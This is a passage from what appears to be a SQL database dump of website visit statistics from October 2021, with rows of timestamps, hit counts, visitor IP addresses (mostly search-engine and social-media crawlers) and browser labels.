,0,0,'66.249.66.219','chrome'),(558446,1633045924,1,0,1,0,'66.249.66.87',''),(558447,1633046550,1,1,0,0,'31.13.103.120','other'),(558448,1633046577,1,1,0,0,'66.249.66.7','chrome'),(558449,1633047138,1,1,0,0,'87.250.224.22','other'),(558450,1633050436,1,1,0,0,'87.250.224.22','other'),(558451,1633054517,1,1,0,0,'87.250.224.35','other'),(558452,1633060491,1,1,0,0,'185.237.217.11','chrome'),(558453,1633063253,1,1,0,0,'185.237.217.11','chrome'),(558454,1633069026,1,1,0,0,'173.252.111.21','other'),(558455,1633069027,2,2,0,0,'173.252.111.119','other'),(558457,1633070255,1,1,0,0,'91.196.178.169','chrome'),(558458,1633073582,1,1,0,0,'173.252.127.18','other'),(558459,1633076146,1,0,1,0,'66.249.66.86',''),(558460,1633078146,2,2,0,0,'92.119.161.213','chrome'),(558461,1633080090,1,1,0,0,'54.208.44.6','firefox'),(558462,1633080950,1,1,0,0,'66.249.66.87','chrome'),(558463,1633088442,1,1,0,0,'31.13.127.30','other'),(558464,1633099135,1,1,0,0,'91.196.178.75','chrome'),(558465,1633103437,1,0,1,0,'66.249.66.85',''),(558466,1633108962,2,2,0,0,'173.252.111.16','other'),(558467,1633108963,2,2,0,0,'173.252.111.119','other'),(558469,1633109435,1,1,0,0,'173.252.87.19','other'),(558470,1633109503,1,1,0,0,'94.153.2.150','chrome'),(558471,1633113401,2,2,0,0,'87.250.224.35','other'),(558472,1633113658,2,2,0,0,'87.250.224.22','other'),(558473,1633113662,3,3,0,0,'87.250.224.22','chrome'),(558474,1633113669,1,1,0,0,'87.250.224.35','chrome'),(558475,1633113728,2,2,0,0,'5.45.207.124','other'),(558476,1633115282,1,1,0,0,'173.252.111.5','other'),(558477,1633115283,2,2,0,0,'173.252.111.16','other'),(558480,1633115284,1,1,0,0,'173.252.111.23','other'),(558481,1633116638,1,1,0,0,'91.196.178.195','chrome'),(558482,1633116643,1,1,0,0,'66.220.149.53','other'),(558483,1633116644,1,1,0,0,'66.220.149.35','other'),(558490,1633116645,1,1,0,0,'66.220.149.36','other'),(558491,1633117183,1,1,0,0,'91.196.178.30','chrome'),(558492,1633121610,1,1,0,0,'66.249.66.158','chrome'),(558493,1633123132,1,1,0,0,'66.249.66.85','chrome'),(558494,1633123463,1,1,0,0,'66.249.66.5','chrome'),(558495,1633123961,1,1,0,0,'66.249.66.159','chrome'),(558496,1633124372,2,2,0,0,'66.249.66.85','chrome'),(558497,1633124807,1,1,0,0,'66.249.66.7','chrome'),(558498,1633125153,1,1,0,0,'66.249.66.158','chrome'),(558499,1633125296,1,1,0,0,'66.249.66.5','chrome'),(558500,1633125297,1,1,0,0,'66.249.66.9','chrome'),(558501,1633131244,1,1,0,0,'66.249.66.85','chrome'),(558502,1633134948,2,2,0,0,'23.146.241.19','firefox'),(558503,1633142308,1,1,0,0,'66.249.66.86','chrome'),(558504,1633167136,1,1,0,0,'207.46.13.116','other'),(558505,1633167160,1,1,0,0,'95.108.213.62','other'),(558506,1633189899,1,1,0,0,'185.237.217.11','chrome'),(558507,1633190939,1,0,1,0,'66.249.66.85',''),(558508,1633191749,1,1,0,0,'91.196.178.203','chrome'),(558509,1633191752,1,1,0,0,'173.252.83.117','other'),(558512,1633191753,1,1,0,0,'173.252.83.14','other'),(558516,1633191754,1,1,0,0,'173.252.83.16','other'),(558517,1633196561,1,1,0,0,'87.250.224.22','other'),(558518,1633210090,1,1,0,0,'44.195.35.75','firefox'),(558519,1633212289,1,1,0,0,'87.250.224.22','other'),(558520,1633217751,1,1,0,0,'213.180.203.67','other'),(558521,1633223087,1,1,0,0,'87.250.224.22','other'),(558522,1633223821,1,1,0,0,'207.46.13.139','other'),(558523,1633227343,1,1,0,0,'87.250.224.35','other'),(558524,1633230166,1,1,0,0,'176.113.43.179','other'),(558526,1633230167,1,1,0,0,'45.131.100.167','other'),(558527,1633230168,1,1,0,0,'185.158.101.180','other'),(558528,1633230169,1,1,0,0,'89.104.110.171','other'),(558529,1633230170,1,1,0,0,'89.104.110.229','other'),(558530,1633234374,1,1,0,0,'5.45.207.124','other'),(558531,1633235159,1,1,0,0,'66.249.66.87','chrome'),(558532,1633235918,1,1,0,0,'181.214.33.155','other'),(558533,1633235919,1,1,0,0,'89.104.110.202','other'),(558536,1633235920,1,1,0,0,'5.180.50.120','other'),(558537,1633235921,1,1,0,0,'191.101.94.60','other'),(558538,1633249574,1,1,0,0,'173.252.87.7','other'),(558539,1633251715,1,1,0,0,'87.250.224.22','other'),(558540,1633266180,1,1,0,0,'66.249.66.85','chrome'),(558541,1633268343,1,1,0,0,'5.45.207.124','other'),(558542,1633276274,1,0,1,0,'66.249.66.86',''),(558543,1633286488,2,2,0,0,'87.250.224.22','other'),(558544,1633288727,1,1,0,0,'94.153.89.223','chrome'),(558545,1633328792,1,1,0,0,'87.250.224.22','other'),(558546,1633330471,1,1,0,0,'66.249.66.85','chrome'),(558547,1633332637,1,1,0,0,'91.196.178.169','chrome'),(558548,1633337377,2,2,0,0,'87.250.224.22','other'),(558549,1633353625,1,1,0,0,'87.250.224.22','other'),(558550,1633362277,1,0,1,0,'66.249.66.87',''),(558551,1633380906,1,0,1,0,'66.249.66.86',''),(558552,1633381139,1,1,0,0,'95.108.213.25','other'),(558553,1633385565,1,0,1,0,'66.249.66.85',''),(558554,1633389655,1,1,0,0,'124.126.78.132','chrome'),(558555,1633391118,1,1,0,0,'87.250.224.29','other'),(558556,1633401006,1,1,0,0,'66.249.66.87','chrome'),(558557,1633401463,1,1,0,0,'18.140.237.141','chrome'),(558558,1633401474,1,1,0,0,'18.140.237.141','other'),(558559,1633402409,1,1,0,0,'66.249.66.87','chrome'),(558560,1633403757,1,1,0,0,'164.90.132.30','other'),(558561,1633404712,1,1,0,0,'167.172.238.41','other'),(558562,1633411098,1,1,0,0,'66.249.66.86','chrome'),(558563,1633411267,2,2,0,0,'173.252.111.117','other'),(558564,1633411268,1,1,0,0,'173.252.111.16','other'),(558565,1633417867,1,1,0,0,'95.108.213.39','chrome'),(558566,1633429154,1,1,0,0,'34.96.130.20','other'),(558567,1633434924,1,1,0,0,'159.89.87.244','chrome'),(558568,1633447960,1,0,1,0,'66.249.66.87',''),(558569,1633452341,2,2,0,0,'212.192.246.83','chrome'),(558570,1633452738,1,1,0,0,'66.249.66.86','chrome'),(558571,1633464991,7,7,0,0,'13.90.255.141','chrome'),(558572,1633469525,1,1,0,0,'18.233.162.36','firefox'),(558573,1633470195,2,2,0,0,'23.148.145.101','firefox'),(558574,1633473866,1,1,0,0,'66.249.66.86','chrome'),(558575,1633474803,1,1,0,0,'87.250.224.29','other'),(558576,1633477564,1,0,1,0,'66.249.66.87',''),(558577,1633481928,4,4,0,0,'196.203.219.49','firefox'),(558578,1633483240,1,1,0,0,'157.55.39.162','other'),(558579,1633504279,1,1,0,0,'173.252.111.11','other'),(558580,1633504280,1,1,0,0,'173.252.111.16','other'),(558581,1633504300,1,1,0,0,'185.237.217.14','chrome'),(558582,1633504302,1,1,0,0,'173.252.111.24','other'),(558583,1633504303,2,2,0,0,'173.252.111.14','other'),(558584,1633504306,1,1,0,0,'173.252.111.120','other'),(558585,1633504523,2,2,0,0,'3.248.192.71','firefox'),(558586,1633509192,1,1,0,0,'91.196.178.164','firefox'),(558587,1633511843,1,1,0,0,'64.227.58.145','firefox'),(558590,1633519955,1,1,0,0,'91.196.178.169','chrome'),(558591,1633531672,1,1,0,0,'87.250.224.100','other'),(558592,1633539133,2,2,0,0,'207.46.13.56','other'),(558593,1633539223,1,1,0,0,'157.55.39.50','other'),(558594,1633539236,1,1,0,0,'157.55.39.162','other'),(558595,1633540128,1,1,0,0,'207.46.13.56','other'),(558596,1633542091,1,0,1,0,'66.249.66.87',''),(558597,1633563812,1,1,0,0,'207.46.13.56','other'),(558598,1633575410,1,1,0,0,'87.250.224.113','other'),(558599,1633588588,1,1,0,0,'207.46.13.56','other'),(558600,1633601476,1,1,0,0,'95.108.213.25','other'),(558601,1633602089,1,1,0,0,'207.46.13.56','other'),(558602,1633610909,1,1,0,0,'66.249.66.87','chrome'),(558603,1633624054,3,3,0,0,'186.64.119.15','firefox'),(558604,1633625064,1,1,0,0,'87.250.224.29','other'),(558605,1633625166,1,1,0,0,'87.250.224.29','chrome'),(558606,1633626481,1,1,0,0,'207.46.13.56','other'),(558607,1633628415,1,0,1,0,'66.249.66.86',''),(558608,1633630899,1,0,1,0,'66.249.66.86',''),(558609,1633632128,3,3,0,0,'186.64.119.225','firefox'),(558610,1633650929,1,1,0,0,'207.46.13.56','other'),(558611,1633660500,1,1,0,0,'95.108.213.25','other'),(558612,1633675504,1,1,0,0,'207.46.13.56','other'),(558613,1633677115,1,1,0,0,'66.249.93.168','chrome'),(558614,1633677116,1,1,0,0,'66.249.93.170','chrome'),(558615,1633681708,1,1,0,0,'34.77.162.9','other'),(558616,1633690927,1,1,0,0,'207.46.13.56','other'),(558617,1633696108,1,1,0,0,'66.249.66.87','chrome'),(558618,1633696421,1,0,1,0,'66.249.66.85',''),(558619,1633699364,1,1,0,0,'31.13.127.1','other'),(558620,1633699365,1,1,0,0,'31.13.127.40','other'),(558621,1633699779,1,0,1,0,'66.249.66.86',''),(558622,1633704740,1,1,0,0,'66.249.66.87','chrome'),(558623,1633707827,2,2,0,0,'87.250.224.29','other'),(558624,1633707879,3,3,0,0,'95.108.213.75','other'),(558625,1633707881,2,2,0,0,'5.255.231.250','other'),(558626,1633707886,5,5,0,0,'95.108.213.25','other'),(558627,1633707896,1,1,0,0,'87.250.224.108','other'),(558628,1633707947,1,1,0,0,'95.108.213.25','chrome'),(558629,1633708076,1,1,0,0,'5.45.207.117','other'),(558630,1633709100,1,1,0,0,'87.250.224.74','other'),(558631,1633709233,1,1,0,0,'207.46.13.56','other'),(558632,1633716592,1,1,0,0,'66.249.66.87','chrome'),(558633,1633717676,1,1,0,0,'207.46.13.56','other'),(558634,1633718679,1,0,1,0,'66.249.66.86',''),(558635,1633720175,1,1,0,0,'95.108.213.17','other'),(558636,1633723268,1,1,0,0,'95.108.213.26','other'),(558637,1633724801,2,2,0,0,'212.192.246.83','chrome'),(558638,1633727478,1,1,0,0,'207.46.13.56','other'),(558639,1633729987,1,1,0,0,'207.46.13.56','other'),(558640,1633731768,1,1,0,0,'87.250.224.38','other'),(558641,1633745830,1,1,0,0,'207.46.13.56','other'),(558642,1633755567,1,0,1,0,'66.249.66.82',''),(558643,1633760483,1,1,0,0,'207.46.13.56','other'),(558644,1633760927,1,1,0,0,'92.118.160.57','other'),(558645,1633764222,1,1,0,0,'207.46.13.56','other'),(558646,1633765706,1,1,0,0,'31.193.1.105','firefox'),(558647,1633767010,1,1,0,0,'31.13.103.15','other'),(558648,1633777454,1,1,0,0,'87.250.224.168','other'),(558649,1633782537,2,2,0,0,'207.46.13.56','other'),(558650,1633783182,1,1,0,0,'92.119.161.233','chrome'),(558652,1633795360,1,1,0,0,'207.46.13.56','other'),(558653,1633798480,1,1,0,0,'173.252.111.24','other'),(558654,1633798481,1,1,0,0,'173.252.111.3','other'),(558655,1633798576,1,1,0,0,'173.252.111.8','other'),(558656,1633800899,2,2,0,0,'92.119.161.248','chrome'),(558657,1633800991,1,1,0,0,'207.46.13.56','other'),(558658,1633803530,1,1,0,0,'95.108.213.63','other'),(558659,1633809736,1,0,1,0,'66.249.66.86',''),(558660,1633810864,1,0,1,0,'66.249.66.87',''),(558661,1633812341,1,0,1,0,'66.249.66.86',''),(558662,1633813561,1,1,0,0,'23.148.145.38','firefox'),(558663,1633819423,1,1,0,0,'207.46.13.56','other'),(558664,1633837851,1,1,0,0,'207.46.13.56','other'),(558665,1633840802,3,3,0,0,'40.124.105.177','other'),(558666,1633847426,1,1,0,0,'207.46.13.56','other'),(558667,1633856300,1,1,0,0,'207.46.13.56','other'),(558668,1633857968,1,1,0,0,'66.249.66.87','chrome'),(558669,1633859782,1,1,0,0,'207.46.13.56','other'),(558670,1633861275,1,1,0,0,'173.252.111.120','other'),(558671,1633864118,1,1,0,0,'95.108.213.17','other'),(558672,1633869091,1,0,1,0,'66.249.66.85',''),(558673,1633869477,1,0,1,0,'66.249.66.87',''),(558674,1633870613,1,1,0,0,'66.249.66.86','chrome'),(558675,1633871476,1,1,0,0,'66.249.66.85','chrome'),(558676,1633873355,1,1,0,0,'66.249.66.87','chrome'),(558677,1633873384,1,0,1,0,'66.249.66.86',''),(558678,1633874643,1,1,0,0,'207.46.13.56','other'),(558679,1633880226,1,0,1,0,'66.249.66.85',''),(558680,1633880638,1,1,0,0,'185.237.217.11','chrome'),(558681,1633883961,2,2,0,0,'173.252.111.9','other'),(558682,1633883962,1,1,0,0,'173.252.111.13','other'),(558684,1633883980,3,3,0,0,'173.252.111.10','other'),(558688,1633883981,1,1,0,0,'173.252.111.26','other'),(558699,1633883982,1,1,0,0,'173.252.111.2','other'),(558703,1633885142,1,1,0,0,'66.249.66.87','chrome'),(558704,1633890202,1,1,0,0,'103.148.156.231','firefox'),(558705,1633892706,1,1,0,0,'157.55.39.153','other'),(558706,1633893083,1,1,0,0,'207.46.13.56','other'),(558707,1633894942,1,1,0,0,'91.196.178.184','other'),(558708,1633897623,1,1,0,0,'87.250.224.141','other'),(558709,1633898747,1,0,1,0,'66.249.66.86',''),(558710,1633901839,1,1,0,0,'66.249.66.86','chrome'),(558711,1633911418,2,2,0,0,'207.46.13.56','other'),(558712,1633918582,1,1,0,0,'213.180.203.95','chrome'),(558713,1633922289,1,1,0,0,'157.55.39.71','other'),(558714,1633924242,1,1,0,0,'207.46.13.56','other'),(558715,1633929823,1,1,0,0,'207.46.13.56','other'),(558716,1633933159,1,1,0,0,'5.45.207.117','other'),(558717,1633933425,1,1,0,0,'173.252.79.32','other'),(558718,1633933427,1,1,0,0,'69.171.251.19','chrome'),(558719,1633933443,1,1,0,0,'69.171.251.116','chrome'),(558720,1633933444,1,1,0,0,'69.171.251.24','chrome'),(558721,1633939403,1,1,0,0,'92.118.160.57','other'),(558722,1633940530,1,1,0,0,'66.249.66.86','chrome'),(558723,1633940765,1,1,0,0,'157.55.39.71','other'),(558724,1633943557,1,1,0,0,'66.249.66.86','chrome'),(558725,1633943763,1,1,0,0,'157.55.39.153','other'),(558726,1633948152,1,1,0,0,'207.46.13.56','other'),(558727,1633948287,1,1,0,0,'66.249.66.85','chrome'),(558728,1633955609,1,1,0,0,'92.118.160.61','other'),(558729,1633956246,1,1,0,0,'66.249.93.168','chrome'),(558731,1633956909,1,1,0,0,'66.249.66.86','chrome'),(558732,1633959645,1,1,0,0,'66.249.66.85','chrome'),(558733,1633965601,1,1,0,0,'87.250.224.155','other'),(558734,1633966580,1,1,0,0,'207.46.13.56','other'),(558735,1633970627,1,1,0,0,'64.246.165.200','firefox'),(558736,1633975788,1,1,0,0,'207.46.13.56','other'),(558737,1633976052,1,1,0,0,'66.249.66.85','chrome'),(558738,1633978015,5,5,0,0,'37.0.11.64','chrome'),(558739,1633983866,1,0,1,0,'66.249.66.87',''),(558740,1633984206,2,2,0,0,'207.46.13.56','other'),(558741,1633988047,1,1,0,0,'207.46.13.56','other'),(558742,1633989191,10,10,0,0,'52.170.69.56','other'),(558743,1633995561,1,1,0,0,'92.118.160.45','other'),(558744,1634003004,1,1,0,0,'207.46.13.56','other'),(558745,1634013366,1,1,0,0,'207.46.13.56','other'),(558746,1634016242,1,1,0,0,'157.55.39.153','other'),(558747,1634018829,1,1,0,0,'207.46.13.56','other'),(558748,1634024254,1,1,0,0,'66.249.66.86','chrome'),(558749,1634024533,1,1,0,0,'207.46.13.56','other'),(558750,1634025619,11,11,0,0,'34.249.197.9','chrome'),(558751,1634042955,1,1,0,0,'207.46.13.56','other'),(558752,1634049847,1,1,0,0,'113.96.250.18','chrome'),(558753,1634050077,1,1,0,0,'87.250.224.113','other'),(558754,1634051620,1,1,0,0,'66.249.66.85','chrome'),(558755,1634052593,1,1,0,0,'5.45.207.117','other'),(558756,1634052909,2,2,0,0,'113.96.250.18','chrome'),(558757,1634053834,1,1,0,0,'42.236.10.78','chrome'),(558758,1634053904,2,2,0,0,'27.115.124.38','chrome'),(558759,1634056756,1,1,0,0,'121.5.226.36','chrome'),(558760,1634061092,1,1,0,0,'207.46.13.56','other'),(558761,1634064378,1,1,0,0,'34.96.130.15','other'),(558762,1634064890,1,1,0,0,'95.108.213.76','other'),(558763,1634064942,1,1,0,0,'113.96.250.18','other'),(558764,1634065748,1,1,0,0,'34.96.130.1','other'),(558765,1634070231,1,0,1,0,'66.249.66.85',''),(558766,1634070270,1,0,1,0,'66.249.66.159',''),(558767,1634072217,1,1,0,0,'185.237.217.11','chrome'),(558768,1634073265,1,1,0,0,'61.135.15.154','chrome'),(558769,1634076047,1,1,0,0,'207.46.13.56','other'),(558770,1634079336,1,1,0,0,'207.46.13.56','other'),(558771,1634081921,1,1,0,0,'207.46.13.56','other'),(558772,1634085165,1,1,0,0,'113.96.250.18','firefox'),(558773,1634087063,1,1,0,0,'113.96.250.18','other'),(558774,1634090395,1,1,0,0,'66.249.66.87','chrome'),(558775,1634098652,1,1,0,0,'66.249.77.39','chrome'),(558776,1634099876,1,1,0,0,'66.249.66.9','chrome'),(558777,1634100411,1,1,0,0,'113.96.250.18','chrome'),(558778,1634100444,1,1,0,0,'66.249.66.85','chrome'),(558779,1634103350,1,1,0,0,'113.96.250.18','chrome'),(558780,1634103681,11,11,0,0,'172.104.54.180','chrome'),(558781,1634106627,1,1,0,0,'66.249.66.85','chrome'),(558782,1634107027,1,1,0,0,'31.13.103.119','other'),(558783,1634110999,3,3,0,0,'113.96.250.18','chrome'),(558784,1634111362,1,1,0,0,'113.96.250.18','other'),(558785,1634112309,1,1,0,0,'113.96.250.18','firefox'),(558786,1634112502,1,1,0,0,'173.252.111.14','other'),(558787,1634112503,1,1,0,0,'173.252.111.24','other'),(558788,1634113697,1,1,0,0,'95.108.213.39','other'),(558789,1634115508,1,1,0,0,'157.55.39.153','other'),(558790,1634117827,1,1,0,0,'113.96.250.18','chrome'),(558791,1634122096,1,1,0,0,'87.250.224.162','other'),(558792,1634122148,1,1,0,0,'87.250.224.191','chrome'),(558793,1634124043,1,1,0,0,'113.96.250.18','chrome'),(558794,1634124947,1,1,0,0,'113.96.250.18','other'),(558795,1634126817,1,1,0,0,'5.45.207.97','other'),(558796,1634127473,1,0,1,0,'66.249.66.87',''),(558797,1634132248,1,1,0,0,'113.96.250.18','chrome'),(558798,1634134176,1,1,0,0,'171.13.14.76','chrome'),(558799,1634136014,1,1,0,0,'46.211.37.225','chrome'),(558800,1634138431,1,1,0,0,'213.180.203.21','other'),(558801,1634146118,1,1,0,0,'92.119.161.249','other'),(558803,1634149717,2,2,0,0,'92.119.161.248','chrome'),(558804,1634150232,1,1,0,0,'113.96.250.18','chrome'),(558805,1634152925,2,2,0,0,'173.252.111.25','other'),(558808,1634152926,1,1,0,0,'173.252.111.22','other'),(558812,1634153760,1,1,0,0,'173.252.111.5','other'),(558813,1634153761,1,1,0,0,'173.252.111.3','other'),(558814,1634155158,2,2,0,0,'173.252.111.7','other'),(558815,1634155193,1,1,0,0,'92.119.161.253','firefox'),(558817,1634156686,1,0,1,0,'66.249.66.86',''),(558818,1634160128,1,1,0,0,'31.13.103.14','other'),(558819,1634160129,1,1,0,0,'31.13.103.1','other'),(558820,1634161313,2,2,0,0,'91.211.251.49','other'),(558821,1634163756,1,1,0,0,'207.46.13.56','other'),(558822,1634165973,1,1,0,0,'91.211.251.49','other'),(558823,1634166964,1,1,0,0,'91.211.251.49','other'),(558824,1634170848,1,1,0,0,'91.211.251.49','other'),(558825,1634171890,1,1,0,0,'66.249.92.195','other'),(558826,1634172701,1,1,0,0,'5.255.253.129','other'),(558827,1634172801,2,2,0,0,'91.211.251.49','other'),(558828,1634173533,1,1,0,0,'113.96.250.18','chrome'),(558829,1634175127,1,1,0,0,'91.211.251.49','other'),(558830,1634175386,1,1,0,0,'113.96.250.18','chrome'),(558831,1634177726,1,1,0,0,'5.45.207.97','other'),(558832,1634180534,1,1,0,0,'91.211.251.49','other'),(558833,1634182586,1,1,0,0,'5.45.207.97','other'),(558834,1634184560,1,1,0,0,'31.13.127.28','other'),(558835,1634184561,3,3,0,0,'31.13.127.25','other'),(558837,1634184562,1,1,0,0,'31.13.127.24','other'),(558840,1634184817,1,1,0,0,'45.129.18.129','chrome'),(558841,1634190549,1,1,0,0,'113.96.250.18','firefox'),(558842,1634192679,1,1,0,0,'113.96.250.18','chrome'),(558843,1634193889,2,2,0,0,'92.119.161.213','other'),(558844,1634194124,1,1,0,0,'173.252.111.7','other'),(558845,1634194139,1,1,0,0,'173.252.111.11','other'),(558846,1634194144,1,1,0,0,'173.252.111.9','other'),(558847,1634195595,1,1,0,0,'20.40.208.119','chrome'),(558848,1634196320,2,2,0,0,'173.252.111.12','other'),(558851,1634196321,5,5,0,0,'173.252.111.23','other'),(558853,1634196533,1,1,0,0,'113.96.250.18','chrome'),(558854,1634197549,2,2,0,0,'113.96.250.18','other'),(558855,1634200604,1,1,0,0,'113.96.250.18','other'),(558856,1634201714,1,1,0,0,'113.96.250.18','chrome'),(558857,1634203896,1,1,0,0,'213.180.203.21','other'),(558858,1634207031,1,1,0,0,'113.96.250.18','chrome'),(558859,1634212758,1,1,0,0,'91.196.178.207','chrome'),(558860,1634214077,1,1,0,0,'185.237.217.11','chrome'),(558861,1634218726,2,2,0,0,'113.96.250.18','msie'),(558862,1634226210,1,1,0,0,'66.249.66.87','chrome'),(558863,1634226992,5,5,0,0,'18.142.107.34','chrome'),(558864,1634227377,2,2,0,0,'113.96.250.18','chrome'),(558865,1634234448,1,1,0,0,'113.96.250.18','chrome'),(558866,1634235075,1,1,0,0,'185.237.217.11','chrome'),(558867,1634238103,2,2,0,0,'113.96.250.18','other'),(558868,1634240335,1,1,0,0,'113.96.250.18','chrome'),(558869,1634241332,1,0,1,0,'66.249.66.9',''),(558870,1634247734,1,1,0,0,'87.250.224.66','chrome'),(558871,1634251251,1,1,0,0,'113.96.250.18','firefox'),(558872,1634252412,1,1,0,0,'5.255.253.184','other'),(558873,1634254915,1,0,1,0,'66.249.66.159',''),(558874,1634255404,1,1,0,0,'66.249.66.158','chrome'),(558875,1634259962,1,1,0,0,'157.55.39.71','other'),(558876,1634261754,1,0,1,0,'66.249.66.199',''),(558877,1634261859,2,2,0,0,'113.96.250.18','chrome'),(558878,1634261865,1,1,0,0,'66.249.66.86','chrome'),(558879,1634269908,1,1,0,0,'66.249.66.159','chrome'),(558880,1634270982,1,1,0,0,'66.249.66.129','chrome'),(558881,1634271324,1,0,1,0,'66.249.66.159',''),(558882,1634274017,1,1,0,0,'93.179.66.18','chrome'),(558883,1634277301,1,1,0,0,'157.55.39.153','other'),(558884,1634278621,1,0,1,0,'66.249.66.87',''),(558885,1634282077,1,1,0,0,'113.96.250.18','other'),(558886,1634289646,1,1,0,0,'113.96.250.18','firefox'),(558887,1634294150,1,1,0,0,'113.96.250.18','firefox'),(558888,1634295767,1,0,1,0,'66.249.66.86',''),(558889,1634297085,1,1,0,0,'113.96.250.18','chrome'),(558890,1634299213,1,1,0,0,'66.249.66.9','chrome'),(558891,1634299466,2,2,0,0,'66.249.66.85','chrome'),(558892,1634303361,1,1,0,0,'95.108.213.3','other'),(558893,1634304428,1,1,0,0,'34.96.130.24','other'),(558894,1634306676,1,1,0,0,'95.108.213.3','other'),(558895,1634308756,1,1,0,0,'113.96.250.18','other'),(558896,1634308815,1,1,0,0,'66.249.66.87','chrome'),(558897,1634309195,3,3,0,0,'113.96.250.18','chrome'),(558898,1634311580,2,2,0,0,'113.96.250.18','chrome'),(558899,1634319199,2,2,0,0,'113.96.250.18','firefox'),(558900,1634319202,1,1,0,0,'113.96.250.18','chrome'),(558901,1634324431,1,0,1,0,'113.96.250.18',''),(558902,1634325230,1,1,0,0,'92.118.160.9','other'),(558903,1634325478,1,1,0,0,'113.96.250.18','chrome'),(558904,1634326790,1,1,0,0,'87.250.224.183','other'),(558905,1634327314,1,1,0,0,'113.96.250.18','chrome'),(558906,1634327797,1,0,1,0,'66.249.66.7',''),(558907,1634327800,1,0,1,0,'66.249.66.197',''),(558908,1634331019,1,0,1,0,'66.249.66.86',''),(558909,1634332182,1,1,0,0,'173.252.111.8','other'),(558910,1634334511,1,1,0,0,'113.96.250.18','chrome'),(558911,1634335737,1,1,0,0,'207.46.13.114','other'),(558912,1634337358,2,2,0,0,'52.152.132.37','firefox'),(558913,1634337532,1,1,0,0,'113.96.250.18','chrome'),(558914,1634339279,1,1,0,0,'66.249.66.87','chrome'),(558915,1634346615,1,1,0,0,'113.96.250.18','chrome'),(558916,1634349166,1,1,0,0,'34.86.35.22','other'),(558917,1634350261,1,1,0,0,'113.96.250.18','chrome'),(558918,1634359525,1,1,0,0,'113.96.250.18','chrome'),(558919,1634375198,1,1,0,0,'1.14.17.89','chrome'),(558920,1634384398,1,1,0,0,'173.252.111.5','other'),(558921,1634384399,1,1,0,0,'173.252.111.18','other'),(558922,1634384464,1,1,0,0,'173.252.111.9','other'),(558923,1634385543,1,0,1,0,'66.249.66.86',''),(558924,1634385776,1,1,0,0,'113.96.250.18','chrome'),(558925,1634389578,1,1,0,0,'66.249.66.87','chrome'),(558926,1634390897,2,2,0,0,'113.96.250.18','firefox'),(558927,1634397494,1,1,0,0,'46.211.5.158','chrome'),(558928,1634397495,1,1,0,0,'173.252.111.7','other'),(558929,1634397571,1,1,0,0,'173.252.111.13','other'),(558930,1634397572,1,1,0,0,'31.13.127.26','other'),(558931,1634397575,1,1,0,0,'173.252.111.24','other'),(558932,1634398316,1,1,0,0,'113.96.250.18','chrome'),(558933,1634399231,1,1,0,0,'113.96.250.18','chrome'),(558934,1634401300,2,2,0,0,'113.96.250.18','other'),(558935,1634409075,1,1,0,0,'5.255.253.142','other'),(558936,1634413281,1,0,1,0,'66.249.66.9',''),(558937,1634415162,1,0,1,0,'66.249.66.85',''),(558938,1634415610,1,1,0,0,'113.96.250.18','other'),(558939,1634418760,1,1,0,0,'113.96.250.18','chrome'),(558940,1634419803,1,1,0,0,'113.96.250.18','other'),(558941,1634420194,1,1,0,0,'87.250.224.153','other'),(558942,1634420878,2,2,0,0,'91.211.251.49','other'),(558943,1634423736,1,1,0,0,'113.96.250.18','chrome'),(558944,1634425495,1,1,0,0,'91.211.251.49','other'),(558945,1634426561,1,1,0,0,'91.211.251.49','other'),(558946,1634430535,1,1,0,0,'91.211.251.49','other'),(558947,1634433050,2,2,0,0,'91.211.251.49','other'),(558948,1634436041,1,1,0,0,'91.211.251.49','other'),(558949,1634442150,1,1,0,0,'91.211.251.49','other'),(558950,1634450756,1,1,0,0,'113.96.250.18','chrome'),(558951,1634455914,1,1,0,0,'87.250.224.35','other'),(558952,1634464265,3,3,0,0,'113.96.250.18','chrome'),(558953,1634467966,1,1,0,0,'113.96.250.18','chrome'),(558954,1634470952,1,1,0,0,'113.96.250.18','other'),(558955,1634475294,1,1,0,0,'95.108.213.44','other'),(558956,1634475920,1,1,0,0,'66.249.66.87','chrome'),(558957,1634478449,2,2,0,0,'113.96.250.18','chrome'),(558958,1634481476,2,2,0,0,'113.96.250.18','chrome'),(558959,1634482642,1,1,0,0,'95.108.213.46','other'),(558960,1634484542,1,1,0,0,'67.205.3.168','firefox'),(558961,1634484950,1,1,0,0,'113.96.250.18','opera'),(558962,1634487605,2,2,0,0,'147.135.249.229','firefox'),(558963,1634489385,1,1,0,0,'66.249.66.86','chrome'),(558964,1634492459,1,1,0,0,'87.250.224.113','other'),(558965,1634496136,1,1,0,0,'173.252.111.3','other'),(558967,1634496137,1,1,0,0,'173.252.111.9','other'),(558968,1634496138,1,1,0,0,'173.252.111.12','other'),(558969,1634496733,1,1,0,0,'141.8.142.77','other'),(558970,1634497137,5,5,0,0,'167.172.87.241','chrome'),(558971,1634499727,1,0,1,0,'66.249.66.86',''),(558972,1634502306,1,1,0,0,'113.96.250.18','chrome'),(558973,1634502962,1,1,0,0,'173.252.111.26','other'),(558974,1634502963,1,1,0,0,'173.252.111.21','other'),(558975,1634505111,1,1,0,0,'66.249.66.199','chrome'),(558976,1634505482,1,1,0,0,'66.249.66.158','chrome'),(558977,1634505769,1,1,0,0,'207.46.13.114','other'),(558978,1634506022,1,1,0,0,'113.96.250.18','chrome'),(558979,1634509437,1,1,0,0,'113.96.250.18','chrome'),(558980,1634524338,1,1,0,0,'45.129.18.199','chrome'),(558981,1634529900,1,1,0,0,'113.96.250.18','chrome'),(558982,1634531731,1,1,0,0,'66.249.66.86','chrome'),(558983,1634537481,1,1,0,0,'51.254.187.181','chrome'),(558984,1634537482,1,1,0,0,'51.254.187.181','other'),(558985,1634538214,1,1,0,0,'66.249.66.87','chrome'),(558986,1634539082,2,0,2,0,'66.249.66.85',''),(558987,1634539112,2,0,2,0,'66.249.66.86',''),(558988,1634539284,1,1,0,0,'66.249.66.85','chrome'),(558989,1634539735,1,1,0,0,'66.249.66.87','chrome'),(558990,1634542125,1,0,1,0,'66.249.66.85',''),(558991,1634542422,1,1,0,0,'196.196.216.155','chrome'),(558992,1634542543,1,1,0,0,'113.96.250.18','chrome'),(558993,1634542810,1,1,0,0,'92.118.160.41','other'),(558994,1634543619,1,0,1,0,'66.249.66.85',''),(558995,1634544604,1,1,0,0,'66.249.66.86','chrome'),(558996,1634545005,1,1,0,0,'66.249.66.87','chrome'),(558997,1634548933,1,1,0,0,'113.96.250.18','other'),(558998,1634550804,1,0,1,0,'66.249.66.86',''),(558999,1634560877,1,1,0,0,'113.96.250.18','chrome'),(559000,1634562835,1,1,0,0,'113.96.250.18','other'),(559001,1634563393,1,0,1,0,'66.249.66.85',''),(559002,1634564113,1,1,0,0,'113.96.250.18','chrome'),(559003,1634567650,2,2,0,